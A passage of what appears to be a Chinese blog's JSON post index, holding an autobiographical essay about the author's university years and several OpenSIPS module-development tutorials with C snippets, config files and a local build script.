可以选择谈谈恋爱。但是一来我囊中羞涩,二来也没有什么长得比较漂亮,一见钟情的女生。所以谈恋爱这事就放下了。 剩下的选择便只有一个,学习。\n对了,就是学习。当其他人都选择游戏娱乐的时候,你稍微用点力,就能比很多人优秀。\n下一个问题就是学习。 学习要有兴趣,并且要决定学什么。\n这种时候,我思潮又落入回忆中,似乎忘记的事情,此刻又清晰想起来。\n那是我初三暑假的时候,参加过一次学校组织的计算机免费培训课程,其中培训了很多东西。像五笔打字、制作flash、学习photoshop之类的。上课老师在课堂上说过,培训结束的时候,会选择几个成绩优异的学生,给予几百块的奖励。为了这几百块的奖励,我也不能退缩,我很快记住了五笔字根。然后在课堂上,我在众同学佩服的眼光中,把五笔字根全部背了一遍给老师听。\n学习的内容中,photoshop真是给我打开了一个通往神秘世界的大门,原来电脑还能做这么牛逼的事情。接下来经过我废寝忘食,专心致志,一丝不苟的学习,我已经知道了一些基本的图片制作技巧。利用这个技巧,我做了很多搞笑的图片,just for fun!\n然而直到暑假结束,很多同学心心念念的几百块奖励,讲课老师再也没有提过。\n我想,有了初中的ps经验,况且我对这东西很感兴趣。所以我就从淘宝上花了几十块钱,买了一本很厚的,讲解photoshop的书。按照书中的指导,我对photoshop有了全面系统的学习,然后又跟着实战,学会了很多关于抠图、美容、特效的技术。虽然我学了photoshop,但是感觉上并没有什么用,因为考试又不考photoshop, 所以我只能自己通过制作一些搞笑图片来自娱自乐。\n然而,一旦你学会某个东西,便真的有派上用场的时候。大四快毕业时,很多同学开始搞简历,简历上一般要贴照片的。所以我便成为了班级里远近闻名的修图大师。\n除了photoshop,专业课上可以说的就是学习编程了。当时我c语言学的非常好,授课老师经常在课堂上提我来回答问题。为了避免回答不上来问题,显得很没面子。我经常在上课之前偷偷的就预习上课的内容,并且学习如何解答课后的习题。所以老师的提问我经常可以轻松的回答。老师似乎觉得我是个可造之才,经常在其他班级上课的时候,也会在课上提我的名字,说:其他班的王xx同学,他这个问题回答的很好。所以一些其他班级的同学,也是知道我的名字的。\n每每到考试之前,我总会收到不少加我QQ好友的申请,然后问我有没有时间,想找我帮他们复习c语言。然后带上饮料,约我到图书馆,当面传道授业解惑。我还记得一个比较奇葩的老师,给同学布置作业,要求实现某某功能,至少要求要有三千行代码,然后该同学东拼西凑,也只凑够了快一千行,然后找我帮忙。\n可以参考:\n大二的暑假,我们搬了校区。从远离市区的新校区,搬到了离市区比较近的老校区。\n快放假了,有不少的同学决定暑假留校,然后找点工作,赚点零花钱。\n我也觉得放假回家没意思,决定暑假找工作。因为我有一些photoshop的基础,所以就在招聘网站上写自己精通photoshop,看看有没有人需要。很快我找到了一份工作,然而刚开始的工作并不是图片制作,而是摄影摄像。具体的内容是给古玩艺术品拍照,然后我就一边学习一边拍照,照片拍完还要用ps做后期处理。所以整个暑假,包括大三,和大四。我基本上都在和古玩艺术品打交道,见识了不少的宝贝。从书画,到紫砂壶,玉器,陶器,手工艺品等等,都有接触。上海的各大古玩城,我也基本都跑过好几遍。也组织过一次小型的拍卖会,主要负责拍卖图册的制作。\n我的大三和大四是很忙的,倒不是学习,而是课外的工作。工作很累,每晚基本上都是9点以后下班,回到学校就基本上10点左右。有时候因为太累而在地铁上睡着,结果坐过站了。正好是最后一班地铁,所以只能下了地铁,步行往回走。\n课外的工作很累,但也学到了不少的东西。除此之外,就是自己赚钱能养活自己了。至少大三和大四,我没有再问父母要过生活费。即使是对于父母,要生活费这件事情,也让我觉得不自在。我是一个向往自由的人,不希望被任何人束缚,即使是父母。\n课外工作的最后阶段,我用自己赚的钱买了人生第一个非常贵的手机iphone6s。我觉得,这是我应得的东西。\n匆匆4年,大学就这么结束了。我对大学并没有什么怀念,只是觉得,我算是蛮幸运的,至少没有白白浪费掉四年的光阴。\n","permalink":"https://wdd.js.org/posts/2021/04/mcgyoz/","summary":"2012年,我从安徽的一个小城市考到上海,前往一个普通的二本院校上大学,学习网络工程。\n在很多人以为,上大学不就是玩吗?其实也基本属实,特别是像我们这种普通的学校。但是我的大学也并没有荒废,这其实也并不是说明我就多优秀。 
这其中的原因,说来也是蛮有意思。我打游戏太菜,而且心理素质不好,且又没有坚持不懈的毅力。所以我就早早的放弃了英雄联盟这种游戏。\n一个大学生,一旦放弃了打游戏,其实他就剩余了很多空余的时间。多余的时间能干生么呢?\n选择不多。1. 可以选择谈谈恋爱。但是一来我囊中羞涩,二来也没有什么长得比较漂亮,一见钟情的女生。所以谈恋爱这事就放下了。 剩下的选择便只有一个,学习。\n对了,就是学习。当其他人都选择游戏娱乐的时候,你稍微用点力,就能比很多人优秀。\n下一个问题就是学习。 学习要有兴趣,并且要决定学什么。\n这种时候,我思潮又落入回忆中,似乎忘记的事情,此刻又清晰想起来。\n那是我初三暑假的时候,参加过一次学校组织的计算机免费培训课程,其中培训了很多东西。像五笔打字、制作flash、学习photoshop之类的。上课老师在课堂上说过,培训结束的时候,会选择几个成绩优异的学生,给予几百块的奖励。为了这几百块的奖励,我也不能退缩,我很快记住了五笔字根。然后在课堂上,我在众同学佩服的眼光中,把五笔字根全部背了一遍给老师听。\n学习的内容中,photoshop真是给我打开了一个通往神秘世界的大门,原来电脑还能做这么牛逼的事情。接下来经过我废寝忘食,专心致志,一丝不苟的学习,我已经知道了一些基本的图片制作技巧。利用这个技巧,我做了很多搞笑的图片,just for fun!\n然而直到暑假结束,很多同学心心念念的几百块奖励,讲课老师再也没有提过。\n我想,有了初中的ps经验,况且我对这东西很感兴趣。所以我就从淘宝上花了几十块钱,买了一本很厚的,讲解photoshop的书。按照书中的指导,我对photoshop有了全面系统的学习,然后又跟着实战,学会了很多关于抠图、美容、特效的技术。虽然我学了photoshop,但是感觉上并没有什么用,因为考试又不考photoshop, 所以我只能自己通过制作一些搞笑图片来自娱自乐。\n然而,一旦你学会某个东西,便真的有派上用场的时候。大四快毕业时,很多同学开始搞简历,简历上一般要贴照片的。所以我便成为了班级里远近闻名的修图大师。\n除了photoshop,专业课上可以说的就是学习编程了。当时我c语言学的非常好,授课老师经常在课堂上提我来回答问题。为了避免回答不上来问题,显得很没面子。我经常在上课之前偷偷的就预习上课的内容,并且学习如何解答课后的习题。所以老师的提问我经常可以轻松的回答。老师似乎觉得我是个可造之才,经常在其他班级上课的时候,也会在课上提我的名字,说:其他班的王xx同学,他这个问题回答的很好。所以一些其他班级的同学,也是知道我的名字的。\n每每到考试之前,我总会收到不少加我QQ好友的申请,然后问我有没有时间,想找我帮他们复习c语言。然后带上饮料,约我到图书馆,当面传道授业解惑。我还记得一个比较奇葩的老师,给同学布置作业,要求实现某某功能,至少要求要有三千行代码,然后该同学东拼西凑,也只凑够了快一千行,然后找我帮忙。\n可以参考:\n大二的暑假,我们搬了校区。从远离市区的新校区,搬到了离市区比较近的老校区。\n快放假了,有不少的同学决定暑假留校,然后找点工作,赚点零花钱。\n我也觉得放假回家没意思,决定暑假找工作。因为我有一些photoshop的基础,所以就在招聘网站上写自己精通photoshop,看看有没有人需要。很快我找到了一份工作,然而刚开始的工作并不是图片制作,而是摄影摄像。具体的内容是给古玩艺术品拍照,然后我就一边学习一边拍照,照片拍完还要用ps做后期处理。所以整个暑假,包括大三,和大四。我基本上都在和古玩艺术品打交道,见识了不少的宝贝。从书画,到紫砂壶,玉器,陶器,手工艺品等等,都有接触。上海的各大古玩城,我也基本都跑过好几遍。也组织过一次小型的拍卖会,主要负责拍卖图册的制作。\n我的大三和大四是很忙的,倒不是学习,而是课外的工作。工作很累,每晚基本上都是9点以后下班,回到学校就基本上10点左右。有时候因为太累而在地铁上睡着,结果坐过站了。正好是最后一班地铁,所以只能下了地铁,步行往回走。\n课外的工作很累,但也学到了不少的东西。除此之外,就是自己赚钱能养活自己了。至少大三和大四,我没有再问父母要过生活费。即使是对于父母,要生活费这件事情,也让我觉得不自在。我是一个向往自由的人,不希望被任何人束缚,即使是父母。\n课外工作的最后阶段,我用自己赚的钱买了人生第一个非常贵的手机iphone6s。我觉得,这是我应得的东西。\n匆匆4年,大学就这么结束了。我对大学并没有什么怀念,只是觉得,我算是蛮幸运的,至少没有白白浪费掉四年的光阴。","title":"我的传记 - 大学篇"},{"content":"flag的类型 enum flag_type { FLAG_TYPE_MSG=0, 
FLAG_TYPE_BRANCH, FLAG_LIST_COUNT, }; flag实际上是一种二进制的位 MAX_FLAG就是一个SIP消息最多可以有多少个flag\n#include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) 这个值更具情况而定,我的机器上是最多32个。\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) int main() { printf(\u0026#34;%zu\\n\u0026#34;, sizeof(unsigned int)); printf(\u0026#34;%u\\n\u0026#34;, CHAR_BIT); printf(\u0026#34;%u\\n\u0026#34;, MAX_FLAG); return 0; } $gcc -o main *.c $main 4 8 31 由字符串获取flag opensips 1.0时,flag都是整数,2.0才引入了字符串。\n用数字容易傻傻分不清楚,字符串比较容易理解。\nsetflag(3); setflag(4); setflag(5); setflag(IS_FROM_SBC); 首先,我们先要获取flag的字符串表示。这个可以用模块的参数传递进来。\nstatic param_export_t params[]={ {\u0026#34;use_test_flag\u0026#34;, STR_PARAM, \u0026amp;use_test_flag_str}, {0,0,0} }; 然后我们需要在mod_init或者fixup函数中获取字符串flag对应的flagId\nstatic int mod_init(void) { flag_use_high = get_flag_id_by_name(FLAG_TYPE_MSG, use_test_flag_str); LM_INFO(\u0026#34;flag mask: %d\\n\u0026#34;, flag_use_high); return 0; } 在消息处理中,用isflagset去判断flag是否存在。isflagset返回-1,就说明flag不存在。返回1就说明flag已经存在。\nstatic int w_find_zone_code(struct sip_msg* msg, char* str1,char* str2) { int is_set = isflagset(msg, flag_use_high); LM_INFO(\u0026#34;flag_use_high is %d\\n\u0026#34;, is_set); return 1; } ","permalink":"https://wdd.js.org/opensips/module-dev/l4-2/","summary":"flag的类型 enum flag_type { FLAG_TYPE_MSG=0, FLAG_TYPE_BRANCH, FLAG_LIST_COUNT, }; flag实际上是一种二进制的位 MAX_FLAG就是一个SIP消息最多可以有多少个flag\n#include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) 这个值更具情况而定,我的机器上是最多32个。\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) int main() { printf(\u0026#34;%zu\\n\u0026#34;, sizeof(unsigned int)); 
printf(\u0026#34;%u\\n\u0026#34;, CHAR_BIT); printf(\u0026#34;%u\\n\u0026#34;, MAX_FLAG); return 0; } $gcc -o main *.c $main 4 8 31 由字符串获取flag opensips 1.0时,flag都是整数,2.0才引入了字符串。\n用数字容易傻傻分不清楚,字符串比较容易理解。","title":"ch4-2 flag获取"},{"content":"最近看到澎湃新闻报道了一个博士论文的致谢部分,内容如下:\n走了很远的路,吃了很多的苦,才将这份博士学位论文送到你的面前。二十二载求学路,一路风雨泥泞,许多不容易。如梦一场,仿佛昨天一家人才团聚过。\n看到这个句子,我瞬间觉得一种似曾相识之感。\n我记得我也曾写过类似的句子。\n我花了很长的时间,走过了人生的大半个青葱岁月的花样年华 才学会什么是效率,什么是专一。 蓦然回首 10年的路,每次转变的开始都是感觉镣铐加身,步履维艰,屡次三番想要放弃\n生命不息 折腾不止 使用ubuntu作为主力开发工具\n其实,这种句子也不是我的原创。是我仿照我看过的一本小说,从中摘抄而来。\n这本小说叫做《项塔兰》\n我花了很长的岁月,走过大半个世界,才真正学到什么是爱、什么是命运,以及我们所做的抉择。我被拴在墙上遭受拷打时,才顿悟这个真谛。不知为何,就在我内心发出呐喊之际,我意识到,即使镣铐加身,一身血污,孤立无助,我仍然是自由之身,我可以决定是要痛恨拷打我的人,还是原谅他们。我知道,这听起来似乎算不了什么,但在镣铐加身、痛苦万分的当下,当镣铐是你唯一仅有的,那份自由将带给你无限的希望。是要痛恨,还是要原谅,这抉择足以决定人一生的际遇。《项塔兰》\n这是一名通缉犯的十年印度流亡岁月的记录,很难想象,一名在逃犯是如何写出如此优秀的文笔。各位看官有时间可以看看。\n参考 https://mp.weixin.qq.com/s/9kfGCXevO5Hlpg_iINof6Q ","permalink":"https://wdd.js.org/posts/2021/04/dttcg5/","summary":"最近看到澎湃新闻报道了一个博士论文的致谢部分,内容如下:\n走了很远的路,吃了很多的苦,才将这份博士学位论文送到你的面前。二十二载求学路,一路风雨泥泞,许多不容易。如梦一场,仿佛昨天一家人才团聚过。\n看到这个句子,我瞬间觉得一种似曾相识之感。\n我记得我也曾写过类似的句子。\n我花了很长的时间,走过了人生的大半个青葱岁月的花样年华 才学会什么是效率,什么是专一。 蓦然回首 10年的路,每次转变的开始都是感觉镣铐加身,步履维艰,屡次三番想要放弃\n生命不息 折腾不止 使用ubuntu作为主力开发工具\n其实,这种句子也不是我的原创。是我仿照我看过的一本小说,从中摘抄而来。\n这本小说叫做《项塔兰》\n我花了很长的岁月,走过大半个世界,才真正学到什么是爱、什么是命运,以及我们所做的抉择。我被拴在墙上遭受拷打时,才顿悟这个真谛。不知为何,就在我内心发出呐喊之际,我意识到,即使镣铐加身,一身血污,孤立无助,我仍然是自由之身,我可以决定是要痛恨拷打我的人,还是原谅他们。我知道,这听起来似乎算不了什么,但在镣铐加身、痛苦万分的当下,当镣铐是你唯一仅有的,那份自由将带给你无限的希望。是要痛恨,还是要原谅,这抉择足以决定人一生的际遇。《项塔兰》\n这是一名通缉犯的十年印度流亡岁月的记录,很难想象,一名在逃犯是如何写出如此优秀的文笔。各位看官有时间可以看看。\n参考 https://mp.weixin.qq.com/s/9kfGCXevO5Hlpg_iINof6Q ","title":"关于中科院回信文字的联想"},{"content":"底层可用 local 缓存存在本地,速度快,但是多实例无法共享,重启后消失 redis 缓存存在redis, 多实例可以共享,重启后不消失 接口 store -cache_store() 存储 fetch -cache_fetch() 获取 remove -cache_remove() 删除 add -cache_add() 递增 sub -cache_sub() 递减 cache_counter_fetch 获取某个key的值 关于过期的单位 虽然文档上没有明说,但是过期的单位都是秒。\ncachedb_local过期 loadmodule \u0026#34;cachedb_local.so\u0026#34; modparam(\u0026#34;cachedb_local\u0026#34;, 
\u0026#34;cachedb_url\u0026#34;, \u0026#34;local://\u0026#34;) modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cache_clean_period\u0026#34;, 600) route[xxx]{ cache_add(\u0026#34;local\u0026#34;, \u0026#34;$fu\u0026#34;, 100, 5); } 假如说:在5秒之内,同一个$fu来了多个请求,在设置这个$fu值的时候,计时器是不会重置的。过期的计时器还是第一次的设置的那个时间点开始计时。\n参考 https://www.opensips.org/Documentation/Tutorials-KeyValueInterface ","permalink":"https://wdd.js.org/opensips/ch6/cachedb/","summary":"底层可用 local 缓存存在本地,速度快,但是多实例无法共享,重启后消失 redis 缓存存在redis, 多实例可以共享,重启后不消失 接口 store -cache_store() 存储 fetch -cache_fetch() 获取 remove -cache_remove() 删除 add -cache_add() 递增 sub -cache_sub() 递减 cache_counter_fetch 获取某个key的值 关于过期的单位 虽然文档上没有明说,但是过期的单位都是秒。\ncachedb_local过期 loadmodule \u0026#34;cachedb_local.so\u0026#34; modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cachedb_url\u0026#34;, \u0026#34;local://\u0026#34;) modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cache_clean_period\u0026#34;, 600) route[xxx]{ cache_add(\u0026#34;local\u0026#34;, \u0026#34;$fu\u0026#34;, 100, 5); } 假如说:在5秒之内,同一个$fu来了多个请求,在设置这个$fu值的时候,计时器是不会重置的。过期的计时器还是第一次的设置的那个时间点开始计时。\n参考 https://www.opensips.org/Documentation/Tutorials-KeyValueInterface ","title":"cachedb的相关问题"},{"content":"模块传参有两种类型\n直接赋值传参 间接函数调用传参 str local_zone_code = {\u0026#34;\u0026#34;,0}; int some_int_param = 0; static param_export_t params[]={ // 直接字符串赋值 {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, // 直接整数赋值 {\u0026#34;some_int_param\u0026#34;, INT_PARAM, \u0026amp;some_int_param}, // 函数调用 字符窜 {\u0026#34;zone_code_map\u0026#34;, STR_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map}, // 函数调用 整数 {\u0026#34;zone_code_map_int\u0026#34;, INT_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map_int}, {0,0,0} }; 使用函数处理参数的好处是,可以对参数做更复杂的处理。\n例如:\n某个参数可以多次传递 对参数进行校验,在启动前就可以判断传参是否有问题。 static int set_code_zone_map(unsigned int type, void *val) { LM_INFO(\u0026#34;set_zone_code_map type:%d val:%s \\n\u0026#34;,type,(char *)val); return 1; } 
","permalink":"https://wdd.js.org/opensips/module-dev/l4-1/","summary":"模块传参有两种类型\n直接赋值传参 间接函数调用传参 str local_zone_code = {\u0026#34;\u0026#34;,0}; int some_int_param = 0; static param_export_t params[]={ // 直接字符串赋值 {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, // 直接整数赋值 {\u0026#34;some_int_param\u0026#34;, INT_PARAM, \u0026amp;some_int_param}, // 函数调用 字符窜 {\u0026#34;zone_code_map\u0026#34;, STR_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map}, // 函数调用 整数 {\u0026#34;zone_code_map_int\u0026#34;, INT_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map_int}, {0,0,0} }; 使用函数处理参数的好处是,可以对参数做更复杂的处理。\n例如:\n某个参数可以多次传递 对参数进行校验,在启动前就可以判断传参是否有问题。 static int set_code_zone_map(unsigned int type, void *val) { LM_INFO(\u0026#34;set_zone_code_map type:%d val:%s \\n\u0026#34;,type,(char *)val); return 1; } ","title":"ch4-1 USE_FUNC_PARAM参数类型"},{"content":"本章节,带领大家探索opensips模块开发。希望深入了解opensips的同学可以看看。\n内容涵盖 章节的内容将会涵盖\nopensips的启动流程 如何创建一个模块 如何给模块传递参数 模块的生命周期函数的处理 如何暴露自定义的函数 如何检查函数的传惨 如何获取$var或者$avp变量 如何获取相关的flag 如何修改SIP消息 如何编写mi接口 如何编写statistics统计数据 如何做数据库操作 OpenSIPS架构 参考 https://voipmagazine.files.wordpress.com/2014/09/opensips-arch.jpg ","permalink":"https://wdd.js.org/opensips/module-dev/l1/","summary":"本章节,带领大家探索opensips模块开发。希望深入了解opensips的同学可以看看。\n内容涵盖 章节的内容将会涵盖\nopensips的启动流程 如何创建一个模块 如何给模块传递参数 模块的生命周期函数的处理 如何暴露自定义的函数 如何检查函数的传惨 如何获取$var或者$avp变量 如何获取相关的flag 如何修改SIP消息 如何编写mi接口 如何编写statistics统计数据 如何做数据库操作 OpenSIPS架构 参考 https://voipmagazine.files.wordpress.com/2014/09/opensips-arch.jpg ","title":"ch1 开发课程简介"},{"content":"开始 我们需要给home_location模块增加一个参数,配置当地的号码区号\n首先,我们删除maxfwd.c文件中开头的很多注释,我们先把注意力集中在代码上。\n删除了30多行注释,代码还剩160多行。\n首先我们一个变量,用来保存本地的区号。这个变量是个str类型。\nstr local_zone_code = {\u0026#34;\u0026#34;,0}; str 关于str类型,可以参考opensips/str.h头文件。\nstruct __str { char* s; /**\u0026lt; string as char array */ int len; /**\u0026lt; string length, not including null-termination */ }; typedef struct __str str; 
实际上,str是个指向__str结构体,可以看出这个结构体有指向字符串的char*类型的指针,以及一个代表字符串长度的len属性。这样做的好处是可以高效的获取字符串的长度,很多有名的开源项目都有类似的结构体。\nopensips几乎所有的字符串都是用的str类型\nparam_export_t param_export_t这个结构体是用来通过脚本里面的modparam向模块传递参数的。这个数组最后一向是{0,0,0} 这最后一项其实是个标志,标志着数组的结束。\nstatic param_export_t params[]={ {\u0026#34;max_limit\u0026#34;, INT_PARAM, \u0026amp;max_limit}, {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, {0,0,0} }; 在sr_module_deps.h和sr_module.h中有下面的代码\ntypedef struct param_export_ param_export_t; param_export_t实际上是指向param_export_这个结构体。\n这个结构体有三个参数\nname 表示参数的名称 modparam_t 表示参数的类型。参数类型有以下几种 STR_PARAM 字符串类型 INT_PARAM 整数类型 USE_FUNC_PARAM 函数类型 PARAM_TYPE_MASK 这个用到的时候再说 param_pointer 是一个指针,用到的时候再具体说明 struct param_export_ { char* name; /*!\u0026lt; null terminated param. name */ modparam_t type; /*!\u0026lt; param. type */ void* param_pointer; /*!\u0026lt; pointer to the param. memory location */ }; #define STR_PARAM (1U\u0026lt;\u0026lt;0) /* String parameter type */ #define INT_PARAM (1U\u0026lt;\u0026lt;1) /* Integer parameter type */ #define USE_FUNC_PARAM (1U\u0026lt;\u0026lt;(8*sizeof(int)-1)) #define PARAM_TYPE_MASK(_x) ((_x)\u0026amp;(~USE_FUNC_PARAM)) typedef unsigned int modparam_t; 回过头来,看看local_zone_code这个参数的配置,是不是就非常明确了呀\n{\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, 接着,你可能会问,加入我们配置好了这个参数,如何再运行的时候将local_zone_code这个变量的值打印出来呢?\n再module_exports这个结构体里面,最后的几个参数实际上是一个函数。\n这些函数再模块的生命周期内会调用。比如那个mod_init, 就是模块初始化的时候就会调用这个函数。\n那么,我们就在模块初始化的时候打印local_zone_code的值好了。\n下面的代码,我们其实只插入了一行, LM_INFO, 用来打印。其他就保持原样好了。\nmod_init函数的返回值是有特殊含义的,如果返回是0,表示成功。如果返回的是负数, 例如E_CFG, 这时候opensips就会认为你的脚本写的有问题,就不会继续启动opensips。\nstatic int mod_init(void) { LM_INFO(\u0026#34;initializing...\\n\u0026#34;); LM_INFO(\u0026#34;Initializing local_zone_code: %s\\n\u0026#34;, local_zone_code.s); if ( max_limit\u0026lt;1 || max_limit\u0026gt;MAXFWD_UPPER_LIMIT ) { LM_ERR(\u0026#34;invalid max limit (%d) [1,%d]\\n\u0026#34;, max_limit,MAXFWD_UPPER_LIMIT); return E_CFG; 
} return 0; } 再error.h中,可以看到opensips定义了很多的错误码。\n编译模块 源码的c文件我们修改好了,下面就是编译它,不知道会不会报错呢?😂\n➜ home_location git:(home_location) ✗ ./dev.sh build /root/code/gitee/opensips make[1]: Entering directory \u0026#39;/root/code/gitee/opensips/modules/home_location\u0026#39; Compiling maxfwd.c Linking home_location.so make[1]: Leaving directory \u0026#39;/root/code/gitee/opensips/modules/home_location\u0026#39; 似乎没啥问题\n编辑dev.cfg 增加local_zone_code参数 loadmodule \u0026#34;/root/code/gitee/opensips/modules/home_location/home_location.so\u0026#34; + modparam(\u0026#34;home_location\u0026#34;, \u0026#34;local_zone_code\u0026#34;, \u0026#34;010\u0026#34;) ./dev.sh start 看看log.txt, local_zone_code已经被打印出来,并且他的值是我们在cfg脚本里配置的010。\n~ Apr 21 13:47:40 [1048372] INFO:home_location:mod_init: initializing... ~ Apr 21 13:47:40 [1048372] INFO:home_location:mod_init: Initializing local_zone_code: 010 ok, 第三章结束。\n","permalink":"https://wdd.js.org/opensips/module-dev/l4/","summary":"开始 我们需要给home_location模块增加一个参数,配置当地的号码区号\n首先,我们删除maxfwd.c文件中开头的很多注释,我们先把注意力集中在代码上。\n删除了30多行注释,代码还剩160多行。\n首先我们一个变量,用来保存本地的区号。这个变量是个str类型。\nstr local_zone_code = {\u0026#34;\u0026#34;,0}; str 关于str类型,可以参考opensips/str.h头文件。\nstruct __str { char* s; /**\u0026lt; string as char array */ int len; /**\u0026lt; string length, not including null-termination */ }; typedef struct __str str; 实际上,str是个指向__str结构体,可以看出这个结构体有指向字符串的char*类型的指针,以及一个代表字符串长度的len属性。这样做的好处是可以高效的获取字符串的长度,很多有名的开源项目都有类似的结构体。\nopensips几乎所有的字符串都是用的str类型\nparam_export_t param_export_t这个结构体是用来通过脚本里面的modparam向模块传递参数的。这个数组最后一向是{0,0,0} 这最后一项其实是个标志,标志着数组的结束。\nstatic param_export_t params[]={ {\u0026#34;max_limit\u0026#34;, INT_PARAM, \u0026amp;max_limit}, {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, {0,0,0} }; 在sr_module_deps.h和sr_module.h中有下面的代码\ntypedef struct param_export_ param_export_t; param_export_t实际上是指向param_export_这个结构体。\n这个结构体有三个参数\nname 表示参数的名称 modparam_t 表示参数的类型。参数类型有以下几种 STR_PARAM 字符串类型 INT_PARAM 整数类型 USE_FUNC_PARAM 函数类型 
PARAM_TYPE_MASK 这个用到的时候再说 param_pointer 是一个指针,用到的时候再具体说明 struct param_export_ { char* name; /*!","title":"ch4 配置模块的启动参数"},{"content":"从头写一个模块是比较麻烦的,我们可以基于一个简单的模块,然后在这个模块上进行一些修改。\n我们基于maxfwd这个模块,复制一个模块,叫做home_location。\n为什么叫做home_location呢?因为我想根据一个手机号,查出它的归属地,然后根据当地的归属地,判断号码前要不要加0\ncd modules cp -R maxfwd home_location ➜ home_location git:(home_location) ✗ ll total 300K drwxr-xr-x 2 root root 4.0K Apr 20 13:56 doc -rw-r--r-- 1 root root 217 Apr 20 14:00 Makefile -rw-r--r-- 1 root root 4.7K Apr 20 14:00 maxfwd.c -rw-r--r-- 1 root root 2.0K Apr 20 13:56 maxfwd.d -rw-r--r-- 1 root root 77K Apr 20 13:56 maxfwd.o -rwxr-xr-x 1 root root 93K Apr 20 13:56 maxfwd.so -rw-r--r-- 1 root root 4.0K Apr 20 13:56 mf_funcs.c -rw-r--r-- 1 root root 2.1K Apr 20 13:56 mf_funcs.d -rw-r--r-- 1 root root 1.2K Apr 20 13:56 mf_funcs.h -rw-r--r-- 1 root root 84K Apr 20 13:56 mf_funcs.o -rw-r--r-- 1 root root 7.0K Apr 20 13:56 README 下面的操作都是操作home_location目录下的文件。\n修改Makefile NAME改为home_location.so\nNAME=home_location.so 修改maxfwd.c module_exports的结构体的第一个参数,改为home_location 编译home_location模块 上面的操作,其实只是给maxfwd模块改了个名字,没有修改任何具体代码。\n我们在home_location目录下创建一个dev.sh脚本文件,用来做一些快速起停,或者编译模块的事项\ndev.sh #!/bin/bash case $1 in build) cd ../../ pwd; make modules modules=modules/home_location ;; start) killall opensips ulimit -t unlimited sleep 1 /usr/local/sbin/opensips -f ./dev.cfg -w . \u0026amp;\u0026gt; log.txt \u0026amp; echo $? 
;; stop) killall opensips echo stop ;; *) echo bad;; esac chmod +x dev.sh # 用来编译home_location模块 ./dev.sh build # 用来启动opensips, 启动opensips之后,输出的日志会写到log.txt文件中, ./dev.sh start # 用来停止opensips ./dev.sh stop dev.cfg 启动opensips需要一个cfg脚本文件,我们自己做一个简单的\n脚本有以下的注意点:\nloadmodule加载home_location.so我使用了绝对路径,如果在你自己的机器上,目录可能需要修改 log_level=3 log_stderror=yes log_facility=LOG_LOCAL0 debug_mode=no memdump=1 auto_aliases=no listen=udp:0.0.0.0:17634 listen=tcp:0.0.0.0:17634 mpath=\u0026#34;/usr/local/lib64/opensips/modules/\u0026#34; loadmodule \u0026#34;proto_udp.so\u0026#34; loadmodule \u0026#34;proto_tcp.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) loadmodule \u0026#34;/root/code/gitee/opensips/modules/home_location/home_location.so\u0026#34; startup_route{ xlog(\u0026#34;opensips startup\u0026#34;); } route{ xlog(\u0026#34;hello\u0026#34;); } 运行demo ./dev.sh build # 构建脚本 ./dev.sh start # 启动opensips 没有意外的话,opensips启动成功,可以看下log.txt的内容, 也可以通过netstat -nulp | grep opensips 查找opensips的进程\n➜ home_location git:(home_location) ✗ tail log.txt Apr 20 23:00:37 [748389] INFO:core:main: using 2 Mb of private process memory Apr 20 23:00:37 [748389] INFO:core:init_reactor_size: reactor size 1024 (using up to 0.03Mb of memory per process) Apr 20 23:00:37 [748389] INFO:core:evi_publish_event: Registered event \u0026lt;E_CORE_THRESHOLD(0)\u0026gt; Apr 20 23:00:37 [748389] INFO:core:evi_publish_event: Registered event \u0026lt;E_CORE_SHM_THRESHOLD(1)\u0026gt; Apr 20 23:00:37 [748389] INFO:core:evi_publish_event: Registered event \u0026lt;E_CORE_PKG_THRESHOLD(2)\u0026gt; Apr 20 23:00:37 [748389] INFO:core:mod_init: initializing UDP-plain protocol Apr 20 23:00:37 [748389] INFO:core:mod_init: initializing TCP-plain protocol Apr 20 23:00:37 [748389] INFO:home_location:mod_init: initializing... 
Apr 20 23:00:37 [748396] opensips startupApr 20 23:00:37 [748380] INFO:core:daemonize: pre-daemon process exiting with 0 Apr 21 05:32:32 [748410] WARNING:core:handle_timer_job: timer job \u0026lt;blcore-expire\u0026gt; has a 100000 us delay in execution ","permalink":"https://wdd.js.org/opensips/module-dev/l3/","summary":"从头写一个模块是比较麻烦的,我们可以基于一个简单的模块,然后在这个模块上进行一些修改。\n我们基于maxfwd这个模块,复制一个模块,叫做home_location。\n为什么叫做home_location呢?因为我想根据一个手机号,查出它的归属地,然后根据当地的归属地,判断号码前要不要加0\ncd modules cp -R maxfwd home_location ➜ home_location git:(home_location) ✗ ll total 300K drwxr-xr-x 2 root root 4.0K Apr 20 13:56 doc -rw-r--r-- 1 root root 217 Apr 20 14:00 Makefile -rw-r--r-- 1 root root 4.7K Apr 20 14:00 